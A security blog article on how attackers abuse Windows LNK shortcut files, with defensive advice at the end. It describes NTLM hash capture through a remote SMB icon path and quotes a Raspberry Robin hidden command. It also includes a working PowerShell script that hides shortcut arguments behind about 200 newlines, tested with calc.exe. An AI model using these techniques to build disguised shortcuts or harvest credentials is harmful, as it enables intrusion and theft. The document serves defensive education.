Using LNK files in cyberattacks

Alexander Romanov, Team Lead, Infrastructure Security, Acronis

In our daily work, we are constantly facing various attacks that can be directed at different organizations. One of these cases was the reason for an in-depth study of LNK files.

According to Microsoft’s documentation on Shell Link Binary files, MS-SHLLINK: Shell Link (.LNK) Binary File is the format of Windows files with the extension "LNK". In this format, a structure is called a shell link or shortcut, and it is a data object that contains information that can be used to access another data object.

How are these files used? They can be a shortcut to launch a browser, open a directory or launch something with additional parameters or with administrator rights.

But what is a Shell Link, and what exactly does it mean that it contains information that can be used to access another data object?

LNK file format

The LNK file format consists of four structures, but in this article, we will explore only one in detail.

·       STRING_DATA refers to a set of structures that convey user interface and path identification information. The presence of these optional structures is controlled by LinkFlags (section 2.1.1) in the ShellLinkHeader (section 2.1).       

·       RELATIVE_PATH defines the location of the link target relative to the file that contains the shell link.

·       WORKING_DIR defines the file system path of the working directory to be used when activating the link target.

·       COMMAND_LINE_ARGUMENTS stores the command-line arguments specified when activating the link target.

How could LNK be abused? NTLM Information Disclosure

A malicious LNK file can be created to use a developed feature in Windows, especially when targeting users in different VLANs by embedding an attacker-controlled network location in a LNK file. The user's system, when accessing a folder with LNK, unwittingly initiates an SMB connection to the specified location. In the context of segmented VLANs, this allows an attacker to potentially intercept NTLM hashes from users in various broadcast VLANs, as the LNK file requests connections across network boundaries. The captured NTLM hashes can then be used for unauthorized access or password cracking. This highlights the importance of maintaining reliable network segmentation and implementing security measures to protect against such attacks over VLANs.

To perform this trick, you just need to set ICON_LOCATION on a server that is controlled by you. This is the easiest part, and you can find a lot of information about this type of attack.

In my example, Icon_location was \\172.27.25.70\test.ico, and whenever I opened the directory with this LNK file, Windows attempted to extract this ico file.

LNK can serve as a vector for executing a harmful script or binary on a user's system. The LNK file can be crafted to include a reference to a script or executable file, often stored remotely or within the LNK itself. Upon executing the malicious LNK file, the system processes the instructions embedded within it, initiating the execution of the associated script or binary. This exploitation can result in the installation of malware, unauthorized system changes or the compromise of sensitive data.

APT examples

Why is this interesting? Many APT groups use LNK in the initial stages of an attack, including:

·       Iranian APT Charming Kitten

·       North Korean threat group ScarCruft (aka APT37)

·       Raspberry Robin

I was interested in the Raspberry Robin case because in our case they hid COMMAND_LINE_ARGUMENTS — and so a user would not see exactly what this LNK did without using a hex editor.

Previous LNK files looked like the below:

But in our case, LNK looked like this:

In the above example, the target features cmd.exe. Nothing special or suspicious, right?

Hidden Commands

What is inside this file? To understand it, we need a HEX editor. Important note: If you use Windows, most of hexadecimal editors will open the target file for you, not the LNK itself. For example, in our case, you will see CMD.exe in HEX.

WinHex has provided me with what I need — the hexadecimal form of the LNK file:

Now, we can see that the LNK should run the next command: `cmd.exe /r type bylch.k| cmd shell32.dll`

And we can find a lot of 0A 0D. It is a HEX form of:

Line feed
                     LF
                     0A
Carriage return
                    CR
                     0D

A lot of CR and LF symbols. But where? I see that CRLF goes after the Comment and before the command line. Comment is the wrong way, but what about command?

If you look at GUI for the LNK, you can see only one field: "Target," which is the result of two fields.

RELATIVE_PATH and COMMAND_LINE_ARGUMENTS

Let's start with Relative_Path. We are facing the problem that the relative path does not support some characters (for example, carriage return), and in case you have a space or tab, Relative_Path will be framed with quotation marks.

Let's check COMMAND_LINE_ARGUMENTS

200 line breaks

225 line breaks

And gotcha! Depending on how many new lines you add, you will find that our /c calc could totally disappear. And on the length of 230, we will achieve the magic of disappearing or just limiting the length of the string that can be displayed to the user.

"Displayed" is an important note here. You can try using a space character and you will also hide the command, but in this case the user will be able to see all these space characters.

The PowerShell script which you may use for testing:

$NAME_STRING="MaliciousShortcut"

$RELATIVE_PATH="C:\Windows\System32\cmd.exe"

$newlines = "`n" * 200

$WORKING_DIR="C:\Windows\System32"

$COMMAND_LINE_ARGUMENTS="$newlines /c calc.exe"

$ICON_LOCATION="C:\Windows\System32\imageres.dll, 197"

$WshShell = New-Object -comObject WScript.Shell

$ShortcutPath = "c:\$NAME_STRING.lnk"

if (Test-Path $ShortcutPath) {

    Remove-Item $ShortcutPath

}

$Shortcut = $WshShell.CreateShortcut($ShortcutPath)

$Shortcut.TargetPath = $RELATIVE_PATH

$Shortcut.WorkingDirectory = $WORKING_DIR

$Shortcut.Arguments = $COMMAND_LINE_ARGUMENTS

$Shortcut.IconLocation = $ICON_LOCATION

$Shortcut.Save()

And now, you can hide any commands that you don't want to show.

Conclusion

As you can find, using LNK is quite popular and could be very harmful. What can you do to protect yourself?

To protect yourself from the NTLM Disclosing, you can restrict NTLM authentication. And Microsoft has announced that it plans to eliminate NT LAN Manager (NTLM) in Windows 11 in the future, as it pivots to alternative methods for authentication and to bolster security.

In case LNK is used to run something else, this LNK file simulates a folder or some popular file types such as PDFs. To find it, you can enable the display of file extensions.

How to enable it in Windows 10:

  1. Open File Explorer. If you do not have an icon for this in the task bar, click Start, click Windows System, and then click File Explorer.
  2. Click the View tab in File Explorer.
  3. Click the box next to File name extensions to see file extensions.
  4. Click the box next to Hidden items to see hidden files.